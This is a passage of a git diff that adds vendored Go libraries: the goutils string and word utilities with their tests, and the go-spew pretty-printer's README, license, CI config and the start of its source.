%v) = %v, want %v", in, maxWidth, x, out) + } +} + +func TestAbbreviateFull(t *testing.T) { + + // Test 1 + in := "abcdefghijklmno" + out := "abcdefg..." + offset := -1 + maxWidth := 10 + + if x, _ := AbbreviateFull(in, offset, maxWidth); x != out { + t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out) + } + + // Test 2 + out = "...fghi..." + offset = 5 + maxWidth = 10 + + if x, _ := AbbreviateFull(in, offset, maxWidth); x != out { + t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out) + } + + // Test 3 + out = "...ijklmno" + offset = 12 + maxWidth = 10 + + if x, _ := AbbreviateFull(in, offset, maxWidth); x != out { + t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out) + } +} + +func TestIndexOf(t *testing.T) { + + // Test 1 + str := "abcafgka" + sub := "a" + start := 0 + out := 0 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + + // Test 2 + start = 1 + out = 3 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + + // Test 3 + start = 4 + out = 7 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + + // Test 4 + sub = "z" + out = -1 + + if x := IndexOf(str, sub, start); x != out { + t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out) + } + +} + +func TestIsBlank(t *testing.T) { + + // Test 1 + str := "" + out := true + + if x := IsBlank(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } + + // Test 2 + str = " " + out = true + + if x := IsBlank(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } + + // Test 3 + str = " abc " + out = false + + if x := IsBlank(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } +} + +func TestDeleteWhiteSpace(t *testing.T) { + + // Test 1 + str := " a b c " + out := "abc" + + if x := DeleteWhiteSpace(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } + + // Test 2 + str = " " + out = "" + + if x := DeleteWhiteSpace(str); x != out { + t.Errorf("IndexOf(%v) = %v, want %v", str, x, out) + } +} + +func TestIndexOfDifference(t *testing.T) { + + str1 := "abc" + str2 := "a_c" + out := 1 + + if x := IndexOfDifference(str1, str2); x != out { + t.Errorf("IndexOfDifference(%v, %v) = %v, want %v", str1, str2, x, out) + } +} + +// ****************************** EXAMPLES ******************************************** + +func ExampleAbbreviate() { + + str := "abcdefg" + out1, _ := Abbreviate(str, 6) + out2, _ := Abbreviate(str, 7) + out3, _ := Abbreviate(str, 8) + out4, _ := Abbreviate(str, 4) + _, err1 := Abbreviate(str, 3) + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + fmt.Println(err1) + // Output: + // abc... + // abcdefg + // abcdefg + // a... + // stringutils illegal argument: Minimum abbreviation width is 4 +} + +func ExampleAbbreviateFull() { + + str := "abcdefghijklmno" + str2 := "abcdefghij" + out1, _ := AbbreviateFull(str, -1, 10) + out2, _ := AbbreviateFull(str, 0, 10) + out3, _ := AbbreviateFull(str, 1, 10) + out4, _ := AbbreviateFull(str, 4, 10) + out5, _ := AbbreviateFull(str, 5, 10) + out6, _ := AbbreviateFull(str, 6, 10) + out7, _ := AbbreviateFull(str, 8, 10) + out8, _ := AbbreviateFull(str, 10, 10) + out9, _ := AbbreviateFull(str, 12, 10) + _, err1 := AbbreviateFull(str2, 0, 3) + _, err2 := AbbreviateFull(str2, 5, 6) + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + fmt.Println(out5) + fmt.Println(out6) + fmt.Println(out7) + fmt.Println(out8) + fmt.Println(out9) + fmt.Println(err1) + fmt.Println(err2) + // Output: + // abcdefg... + // abcdefg... + // abcdefg... + // abcdefg... + // ...fghi... + // ...ghij... + // ...ijklmno + // ...ijklmno + // ...ijklmno + // stringutils illegal argument: Minimum abbreviation width is 4 + // stringutils illegal argument: Minimum abbreviation width with offset is 7 +} + +func ExampleIsBlank() { + + out1 := IsBlank("") + out2 := IsBlank(" ") + out3 := IsBlank("bob") + out4 := IsBlank(" bob ") + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + // Output: + // true + // true + // false + // false +} + +func ExampleDeleteWhiteSpace() { + + out1 := DeleteWhiteSpace(" ") + out2 := DeleteWhiteSpace("bob") + out3 := DeleteWhiteSpace("bob ") + out4 := DeleteWhiteSpace(" b o b ") + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + // Output: + // + // bob + // bob + // bob +} + +func ExampleIndexOf() { + + str := "abcdefgehije" + out1 := IndexOf(str, "e", 0) + out2 := IndexOf(str, "e", 5) + out3 := IndexOf(str, "e", 8) + out4 := IndexOf(str, "eh", 0) + out5 := IndexOf(str, "eh", 22) + out6 := IndexOf(str, "z", 0) + out7 := IndexOf(str, "", 0) + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + fmt.Println(out5) + fmt.Println(out6) + fmt.Println(out7) + // Output: + // 4 + // 7 + // 11 + // 7 + // -1 + // -1 + // -1 +} + +func ExampleIndexOfDifference() { + + out1 := IndexOfDifference("abc", "abc") + out2 := IndexOfDifference("ab", "abxyz") + out3 := IndexOfDifference("", "abc") + out4 := IndexOfDifference("abcde", "abxyz") + + fmt.Println(out1) + fmt.Println(out2) + fmt.Println(out3) + fmt.Println(out4) + // Output: + // -1 + // 2 + // 0 + // 2 +} diff --git a/vendor/github.com/aokoli/goutils/wordutils.go b/vendor/github.com/aokoli/goutils/wordutils.go new file mode 100644 index 0000000000..e92dd39900 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/wordutils.go @@ -0,0 +1,356 @@ +/* +Copyright 2014 Alexander Okoli + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +/* +Package goutils provides utility functions to manipulate strings in various ways. +The code snippets below show examples of how to use goutils. Some functions return +errors while others do not, so usage would vary as a result. + +Example: + + package main + + import ( + "fmt" + "github.com/aokoli/goutils" + ) + + func main() { + + // EXAMPLE 1: A goutils function which returns no errors + fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF" + + + + // EXAMPLE 2: A goutils function which returns an error + rand1, err1 := goutils.Random (-1, 0, 0, true, true) + + if err1 != nil { + fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...) + } else { + fmt.Println(rand1) + } + } +*/ +package goutils + +import ( + "bytes" + "strings" + "unicode" +) + +// VERSION indicates the current version of goutils +const VERSION = "1.0.0" + +/* +Wrap wraps a single line of text, identifying words by ' '. +New lines will be separated by '\n'. Very long words, such as URLs will not be wrapped. +Leading spaces on a new line are stripped. Trailing spaces are not stripped. + +Parameters: + str - the string to be word wrapped + wrapLength - the column (a column can fit only one character) to wrap the words at, less than 1 is treated as 1 + +Returns: + a line with newlines inserted +*/ +func Wrap(str string, wrapLength int) string { + return WrapCustom(str, wrapLength, "", false) +} + +/* +WrapCustom wraps a single line of text, identifying words by ' '. +Leading spaces on a new line are stripped. Trailing spaces are not stripped. + +Parameters: + str - the string to be word wrapped + wrapLength - the column number (a column can fit only one character) to wrap the words at, less than 1 is treated as 1 + newLineStr - the string to insert for a new line, "" uses '\n' + wrapLongWords - true if long words (such as URLs) should be wrapped + +Returns: + a line with newlines inserted +*/ +func WrapCustom(str string, wrapLength int, newLineStr string, wrapLongWords bool) string { + + if str == "" { + return "" + } + if newLineStr == "" { + newLineStr = "\n" // TODO Assumes "\n" is seperator. Explore SystemUtils.LINE_SEPARATOR from Apache Commons + } + if wrapLength < 1 { + wrapLength = 1 + } + + inputLineLength := len(str) + offset := 0 + + var wrappedLine bytes.Buffer + + for inputLineLength-offset > wrapLength { + + if rune(str[offset]) == ' ' { + offset++ + continue + } + + end := wrapLength + offset + 1 + spaceToWrapAt := strings.LastIndex(str[offset:end], " ") + offset + + if spaceToWrapAt >= offset { + // normal word (not longer than wrapLength) + wrappedLine.WriteString(str[offset:spaceToWrapAt]) + wrappedLine.WriteString(newLineStr) + offset = spaceToWrapAt + 1 + + } else { + // long word or URL + if wrapLongWords { + end := wrapLength + offset + // long words are wrapped one line at a time + wrappedLine.WriteString(str[offset:end]) + wrappedLine.WriteString(newLineStr) + offset += wrapLength + } else { + // long words aren't wrapped, just extended beyond limit + end := wrapLength + offset + spaceToWrapAt = strings.IndexRune(str[end:len(str)], ' ') + end + if spaceToWrapAt >= 0 { + wrappedLine.WriteString(str[offset:spaceToWrapAt]) + wrappedLine.WriteString(newLineStr) + offset = spaceToWrapAt + 1 + } else { + wrappedLine.WriteString(str[offset:len(str)]) + offset = inputLineLength + } + } + } + } + + wrappedLine.WriteString(str[offset:len(str)]) + + return wrappedLine.String() + +} + +/* +Capitalize capitalizes all the delimiter separated words in a string. Only the first letter of each word is changed. +To convert the rest of each word to lowercase at the same time, use CapitalizeFully(str string, delimiters ...rune). +The delimiters represent a set of characters understood to separate words. The first string character +and the first non-delimiter character after a delimiter will be capitalized. A "" input string returns "". +Capitalization uses the Unicode title case, normally equivalent to upper case. + +Parameters: + str - the string to capitalize + delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter + +Returns: + capitalized string +*/ +func Capitalize(str string, delimiters ...rune) string { + + var delimLen int + + if delimiters == nil { + delimLen = -1 + } else { + delimLen = len(delimiters) + } + + if str == "" || delimLen == 0 { + return str + } + + buffer := []rune(str) + capitalizeNext := true + for i := 0; i < len(buffer); i++ { + ch := buffer[i] + if isDelimiter(ch, delimiters...) { + capitalizeNext = true + } else if capitalizeNext { + buffer[i] = unicode.ToTitle(ch) + capitalizeNext = false + } + } + return string(buffer) + +} + +/* +CapitalizeFully converts all the delimiter separated words in a string into capitalized words, that is each word is made up of a +titlecase character and then a series of lowercase characters. The delimiters represent a set of characters understood +to separate words. The first string character and the first non-delimiter character after a delimiter will be capitalized. +Capitalization uses the Unicode title case, normally equivalent to upper case. + +Parameters: + str - the string to capitalize fully + delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter + +Returns: + capitalized string +*/ +func CapitalizeFully(str string, delimiters ...rune) string { + + var delimLen int + + if delimiters == nil { + delimLen = -1 + } else { + delimLen = len(delimiters) + } + + if str == "" || delimLen == 0 { + return str + } + str = strings.ToLower(str) + return Capitalize(str, delimiters...) +} + +/* +Uncapitalize uncapitalizes all the whitespace separated words in a string. Only the first letter of each word is changed. +The delimiters represent a set of characters understood to separate words. The first string character and the first non-delimiter +character after a delimiter will be uncapitalized. Whitespace is defined by unicode.IsSpace(char). + +Parameters: + str - the string to uncapitalize fully + delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter + +Returns: + uncapitalized string +*/ +func Uncapitalize(str string, delimiters ...rune) string { + + var delimLen int + + if delimiters == nil { + delimLen = -1 + } else { + delimLen = len(delimiters) + } + + if str == "" || delimLen == 0 { + return str + } + + buffer := []rune(str) + uncapitalizeNext := true // TODO Always makes capitalize/un apply to first char. + for i := 0; i < len(buffer); i++ { + ch := buffer[i] + if isDelimiter(ch, delimiters...) { + uncapitalizeNext = true + } else if uncapitalizeNext { + buffer[i] = unicode.ToLower(ch) + uncapitalizeNext = false + } + } + return string(buffer) +} + +/* +SwapCase swaps the case of a string using a word based algorithm. + +Conversion algorithm: + + Upper case character converts to Lower case + Title case character converts to Lower case + Lower case character after Whitespace or at start converts to Title case + Other Lower case character converts to Upper case + Whitespace is defined by unicode.IsSpace(char). + +Parameters: + str - the string to swap case + +Returns: + the changed string +*/ +func SwapCase(str string) string { + if str == "" { + return str + } + buffer := []rune(str) + + whitespace := true + + for i := 0; i < len(buffer); i++ { + ch := buffer[i] + if unicode.IsUpper(ch) { + buffer[i] = unicode.ToLower(ch) + whitespace = false + } else if unicode.IsTitle(ch) { + buffer[i] = unicode.ToLower(ch) + whitespace = false + } else if unicode.IsLower(ch) { + if whitespace { + buffer[i] = unicode.ToTitle(ch) + whitespace = false + } else { + buffer[i] = unicode.ToUpper(ch) + } + } else { + whitespace = unicode.IsSpace(ch) + } + } + return string(buffer) +} + +/* +Initials extracts the initial letters from each word in the string. The first letter of the string and all first +letters after the defined delimiters are returned as a new string. Their case is not changed. If the delimiters +parameter is excluded, then Whitespace is used. Whitespace is defined by unicode.IsSpacea(char). An empty delimiter array returns an empty string. + +Parameters: + str - the string to get initials from + delimiters - set of characters to determine words, exclusion of this parameter means whitespace would be delimeter +Returns: + string of initial letters +*/ +func Initials(str string, delimiters ...rune) string { + if str == "" { + return str + } + if delimiters != nil && len(delimiters) == 0 { + return "" + } + strLen := len(str) + var buf bytes.Buffer + lastWasGap := true + for i := 0; i < strLen; i++ { + ch := rune(str[i]) + + if isDelimiter(ch, delimiters...) { + lastWasGap = true + } else if lastWasGap { + buf.WriteRune(ch) + lastWasGap = false + } + } + return buf.String() +} + +// private function (lower case func name) +func isDelimiter(ch rune, delimiters ...rune) bool { + if delimiters == nil { + return unicode.IsSpace(ch) + } + for _, delimiter := range delimiters { + if ch == delimiter { + return true + } + } + return false +} diff --git a/vendor/github.com/aokoli/goutils/wordutils_test.go b/vendor/github.com/aokoli/goutils/wordutils_test.go new file mode 100644 index 0000000000..377d9439c9 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/wordutils_test.go @@ -0,0 +1,225 @@ +package goutils + +import ( + "fmt" + "testing" +) + +// ****************************** TESTS ******************************************** + +func TestWrapNormalWord(t *testing.T) { + + in := "Bob Manuel Bob Manuel" + out := "Bob Manuel\nBob Manuel" + wrapLength := 10 + + if x := Wrap(in, wrapLength); x != out { + t.Errorf("Wrap(%v) = %v, want %v", in, x, out) + } +} + +func TestWrapCustomLongWordFalse(t *testing.T) { + + in := "BobManuelBob Bob" + out := "BobManuelBobBob" + wrapLength := 10 + newLineStr := "" + wrapLongWords := false + + if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out { + t.Errorf("Wrap(%v) = %v, want %v", in, x, out) + } +} + +func TestWrapCustomLongWordTrue(t *testing.T) { + + in := "BobManuelBob Bob" + out := "BobManuelBob Bob" + wrapLength := 10 + newLineStr := "" + wrapLongWords := true + + if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out { + t.Errorf("WrapCustom(%v) = %v, want %v", in, x, out) + } +} + +func TestCapitalize(t *testing.T) { + + // Test 1: Checks if function works with 1 parameter, and default whitespace delimiter + in := "test is going.well.thank.you.for inquiring" + out := "Test Is Going.well.thank.you.for Inquiring" + + if x := Capitalize(in); x != out { + t.Errorf("Capitalize(%v) = %v, want %v", in, x, out) + } + + // Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.' + out = "Test Is Going.Well.Thank.You.For Inquiring" + delimiters := []rune{' ', '.'} + + if x := Capitalize(in, delimiters...); x != out { + t.Errorf("Capitalize(%v) = %v, want %v", in, x, out) + } +} + +func TestCapitalizeFully(t *testing.T) { + + // Test 1 + in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING" + out := "Test Is Going.well.thank.you.for Inquiring" + + if x := CapitalizeFully(in); x != out { + t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out) + } + + // Test 2 + out = "Test Is Going.Well.Thank.You.For Inquiring" + delimiters := []rune{' ', '.'} + + if x := CapitalizeFully(in, delimiters...); x != out { + t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out) + } +} + +func TestUncapitalize(t *testing.T) { + + // Test 1: Checks if function works with 1 parameter, and default whitespace delimiter + in := "This Is A.Test" + out := "this is a.Test" + + if x := Uncapitalize(in); x != out { + t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out) + } + + // Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.' + out = "this is a.test" + delimiters := []rune{' ', '.'} + + if x := Uncapitalize(in, delimiters...); x != out { + t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out) + } +} + +func TestSwapCase(t *testing.T) { + + in := "This Is A.Test" + out := "tHIS iS a.tEST" + + if x := SwapCase(in); x != out { + t.Errorf("SwapCase(%v) = %v, want %v", in, x, out) + } +} + +func TestInitials(t *testing.T) { + + // Test 1 + in := "John Doe.Ray" + out := "JD" + + if x := Initials(in); x != out { + t.Errorf("Initials(%v) = %v, want %v", in, x, out) + } + + // Test 2 + out = "JDR" + delimiters := []rune{' ', '.'} + + if x := Initials(in, delimiters...); x != out { + t.Errorf("Initials(%v) = %v, want %v", in, x, out) + } + +} + +// ****************************** EXAMPLES ******************************************** + +func ExampleWrap() { + + in := "Bob Manuel Bob Manuel" + wrapLength := 10 + + fmt.Println(Wrap(in, wrapLength)) + // Output: + // Bob Manuel + // Bob Manuel +} + +func ExampleWrapCustom_1() { + + in := "BobManuelBob Bob" + wrapLength := 10 + newLineStr := "" + wrapLongWords := false + + fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords)) + // Output: + // BobManuelBobBob +} + +func ExampleWrapCustom_2() { + + in := "BobManuelBob Bob" + wrapLength := 10 + newLineStr := "" + wrapLongWords := true + + fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords)) + // Output: + // BobManuelBob Bob +} + +func ExampleCapitalize() { + + in := "test is going.well.thank.you.for inquiring" // Compare input to CapitalizeFully example + delimiters := []rune{' ', '.'} + + fmt.Println(Capitalize(in)) + fmt.Println(Capitalize(in, delimiters...)) + // Output: + // Test Is Going.well.thank.you.for Inquiring + // Test Is Going.Well.Thank.You.For Inquiring +} + +func ExampleCapitalizeFully() { + + in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING" // Notice scattered capitalization + delimiters := []rune{' ', '.'} + + fmt.Println(CapitalizeFully(in)) + fmt.Println(CapitalizeFully(in, delimiters...)) + // Output: + // Test Is Going.well.thank.you.for Inquiring + // Test Is Going.Well.Thank.You.For Inquiring +} + +func ExampleUncapitalize() { + + in := "This Is A.Test" + delimiters := []rune{' ', '.'} + + fmt.Println(Uncapitalize(in)) + fmt.Println(Uncapitalize(in, delimiters...)) + // Output: + // this is a.Test + // this is a.test +} + +func ExampleSwapCase() { + + in := "This Is A.Test" + fmt.Println(SwapCase(in)) + // Output: + // tHIS iS a.tEST +} + +func ExampleInitials() { + + in := "John Doe.Ray" + delimiters := []rune{' ', '.'} + + fmt.Println(Initials(in)) + fmt.Println(Initials(in, delimiters...)) + // Output: + // JD + // JDR +} diff --git a/vendor/github.com/davecgh/go-spew/.gitignore b/vendor/github.com/davecgh/go-spew/.gitignore new file mode 100644 index 0000000000..00268614f0 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/.gitignore @@ -0,0 +1,22 @@ +# Compiled Object files, Static and Dynamic libs (Shared Objects) +*.o +*.a +*.so + +# Folders +_obj +_test + +# Architecture specific extensions/prefixes +*.[568vq] +[568vq].out + +*.cgo1.go +*.cgo2.c +_cgo_defun.c +_cgo_gotypes.go +_cgo_export.* + +_testmain.go + +*.exe diff --git a/vendor/github.com/davecgh/go-spew/.travis.yml b/vendor/github.com/davecgh/go-spew/.travis.yml new file mode 100644 index 0000000000..984e0736e7 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/.travis.yml @@ -0,0 +1,14 @@ +language: go +go: + - 1.5.4 + - 1.6.3 + - 1.7 +install: + - go get -v golang.org/x/tools/cmd/cover +script: + - go test -v -tags=safe ./spew + - go test -v -tags=testcgo ./spew -covermode=count -coverprofile=profile.cov +after_success: + - go get -v github.com/mattn/goveralls + - export PATH=$PATH:$HOME/gopath/bin + - goveralls -coverprofile=profile.cov -service=travis-ci diff --git a/vendor/github.com/davecgh/go-spew/LICENSE b/vendor/github.com/davecgh/go-spew/LICENSE new file mode 100644 index 0000000000..c836416192 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/LICENSE @@ -0,0 +1,15 @@ +ISC License + +Copyright (c) 2012-2016 Dave Collins + +Permission to use, copy, modify, and distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. diff --git a/vendor/github.com/davecgh/go-spew/README.md b/vendor/github.com/davecgh/go-spew/README.md new file mode 100644 index 0000000000..262430449b --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/README.md @@ -0,0 +1,205 @@ +go-spew +======= + +[![Build Status](https://img.shields.io/travis/davecgh/go-spew.svg)] +(https://travis-ci.org/davecgh/go-spew) [![ISC License] +(http://img.shields.io/badge/license-ISC-blue.svg)](http://copyfree.org) [![Coverage Status] +(https://img.shields.io/coveralls/davecgh/go-spew.svg)] +(https://coveralls.io/r/davecgh/go-spew?branch=master) + + +Go-spew implements a deep pretty printer for Go data structures to aid in +debugging. A comprehensive suite of tests with 100% test coverage is provided +to ensure proper functionality. See `test_coverage.txt` for the gocov coverage +report. Go-spew is licensed under the liberal ISC license, so it may be used in +open source or commercial projects. + +If you're interested in reading about how this package came to life and some +of the challenges involved in providing a deep pretty printer, there is a blog +post about it +[here](https://web.archive.org/web/20160304013555/https://blog.cyphertite.com/go-spew-a-journey-into-dumping-go-data-structures/). + +## Documentation + +[![GoDoc](https://img.shields.io/badge/godoc-reference-blue.svg)] +(http://godoc.org/github.com/davecgh/go-spew/spew) + +Full `go doc` style documentation for the project can be viewed online without +installing this package by using the excellent GoDoc site here: +http://godoc.org/github.com/davecgh/go-spew/spew + +You can also view the documentation locally once the package is installed with +the `godoc` tool by running `godoc -http=":6060"` and pointing your browser to +http://localhost:6060/pkg/github.com/davecgh/go-spew/spew + +## Installation + +```bash +$ go get -u github.com/davecgh/go-spew/spew +``` + +## Quick Start + +Add this import line to the file you're working in: + +```Go +import "github.com/davecgh/go-spew/spew" +``` + +To dump a variable with full newlines, indentation, type, and pointer +information use Dump, Fdump, or Sdump: + +```Go +spew.Dump(myVar1, myVar2, ...) +spew.Fdump(someWriter, myVar1, myVar2, ...) +str := spew.Sdump(myVar1, myVar2, ...) +``` + +Alternatively, if you would prefer to use format strings with a compacted inline +printing style, use the convenience wrappers Printf, Fprintf, etc with %v (most +compact), %+v (adds pointer addresses), %#v (adds types), or %#+v (adds types +and pointer addresses): + +```Go +spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2) +spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) +spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2) +spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) +``` + +## Debugging a Web Application Example + +Here is an example of how you can use `spew.Sdump()` to help debug a web application. Please be sure to wrap your output using the `html.EscapeString()` function for safety reasons. You should also only use this debugging technique in a development environment, never in production. + +```Go +package main + +import ( + "fmt" + "html" + "net/http" + + "github.com/davecgh/go-spew/spew" +) + +func handler(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "text/html") + fmt.Fprintf(w, "Hi there, %s!", r.URL.Path[1:]) + fmt.Fprintf(w, "") +} + +func main() { + http.HandleFunc("/", handler) + http.ListenAndServe(":8080", nil) +} +``` + +## Sample Dump Output + +``` +(main.Foo) { + unexportedField: (*main.Bar)(0xf84002e210)({ + flag: (main.Flag) flagTwo, + data: (uintptr) + }), + ExportedField: (map[interface {}]interface {}) { + (string) "one": (bool) true + } +} +([]uint8) { + 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... | + 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0| + 00000020 31 32 |12| +} +``` + +## Sample Formatter Output + +Double pointer to a uint8: +``` + %v: <**>5 + %+v: <**>(0xf8400420d0->0xf8400420c8)5 + %#v: (**uint8)5 + %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5 +``` + +Pointer to circular struct with a uint8 field and a pointer to itself: +``` + %v: <*>{1 <*>} + %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)} + %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)} + %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)} +``` + +## Configuration Options + +Configuration of spew is handled by fields in the ConfigState type. For +convenience, all of the top-level functions use a global state available via the +spew.Config global. + +It is also possible to create a ConfigState instance that provides methods +equivalent to the top-level functions. This allows concurrent configuration +options. See the ConfigState documentation for more details. + +``` +* Indent + String to use for each indentation level for Dump functions. + It is a single space by default. A popular alternative is "\t". + +* MaxDepth + Maximum number of levels to descend into nested data structures. + There is no limit by default. + +* DisableMethods + Disables invocation of error and Stringer interface methods. + Method invocation is enabled by default. + +* DisablePointerMethods + Disables invocation of error and Stringer interface methods on types + which only accept pointer receivers from non-pointer variables. This option + relies on access to the unsafe package, so it will not have any effect when + running in environments without access to the unsafe package such as Google + App Engine or with the "safe" build tag specified. + Pointer method invocation is enabled by default. + +* DisablePointerAddresses + DisablePointerAddresses specifies whether to disable the printing of + pointer addresses. This is useful when diffing data structures in tests. + +* DisableCapacities + DisableCapacities specifies whether to disable the printing of capacities + for arrays, slices, maps and channels. This is useful when diffing data + structures in tests. + +* ContinueOnMethod + Enables recursion into types after invoking error and Stringer interface + methods. Recursion after method invocation is disabled by default. + +* SortKeys + Specifies map keys should be sorted before being printed. Use + this to have a more deterministic, diffable output. Note that + only native types (bool, int, uint, floats, uintptr and string) + and types which implement error or Stringer interfaces are supported, + with other types sorted according to the reflect.Value.String() output + which guarantees display stability. Natural map order is used by + default. + +* SpewKeys + SpewKeys specifies that, as a last resort attempt, map keys should be + spewed to strings and sorted by those strings. This is only considered + if SortKeys is true. + +``` + +## Unsafe Package Dependency + +This package relies on the unsafe package to perform some of the more advanced +features, however it also supports a "limited" mode which allows it to work in +environments where the unsafe package is not available. By default, it will +operate in this mode on Google App Engine and when compiled with GopherJS. The +"safe" build tag may also be specified to force the package to build without +using the unsafe package. + +## License + +Go-spew is licensed under the [copyfree](http://copyfree.org) ISC License. diff --git a/vendor/github.com/davecgh/go-spew/cov_report.sh b/vendor/github.com/davecgh/go-spew/cov_report.sh new file mode 100644 index 0000000000..9579497e41 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/cov_report.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# This script uses gocov to generate a test coverage report. +# The gocov tool my be obtained with the following command: +# go get github.com/axw/gocov/gocov +# +# It will be installed to $GOPATH/bin, so ensure that location is in your $PATH. + +# Check for gocov. +if ! type gocov >/dev/null 2>&1; then + echo >&2 "This script requires the gocov tool." + echo >&2 "You may obtain it with the following command:" + echo >&2 "go get github.com/axw/gocov/gocov" + exit 1 +fi + +# Only run the cgo tests if gcc is installed. +if type gcc >/dev/null 2>&1; then + (cd spew && gocov test -tags testcgo | gocov report) +else + (cd spew && gocov test | gocov report) +fi diff --git a/vendor/github.com/davecgh/go-spew/spew/bypass.go b/vendor/github.com/davecgh/go-spew/spew/bypass.go new file mode 100644 index 0000000000..8a4a6589a2 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/bypass.go @@ -0,0 +1,152 @@ +// Copyright (c) 2015-2016 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when the code is not running on Google App Engine, compiled by GopherJS, and +// "-tags safe" is not added to the go build command line. The "disableunsafe" +// tag is deprecated and thus should not be used. +// +build !js,!appengine,!safe,!disableunsafe + +package spew + +import ( + "reflect" + "unsafe" +) + +const ( + // UnsafeDisabled is a build-time constant which specifies whether or + // not access to the unsafe package is available. + UnsafeDisabled = false + + // ptrSize is the size of a pointer on the current arch. + ptrSize = unsafe.Sizeof((*byte)(nil)) +) + +var ( + // offsetPtr, offsetScalar, and offsetFlag are the offsets for the + // internal reflect.Value fields. These values are valid before golang + // commit ecccf07e7f9d which changed the format. The are also valid + // after commit 82f48826c6c7 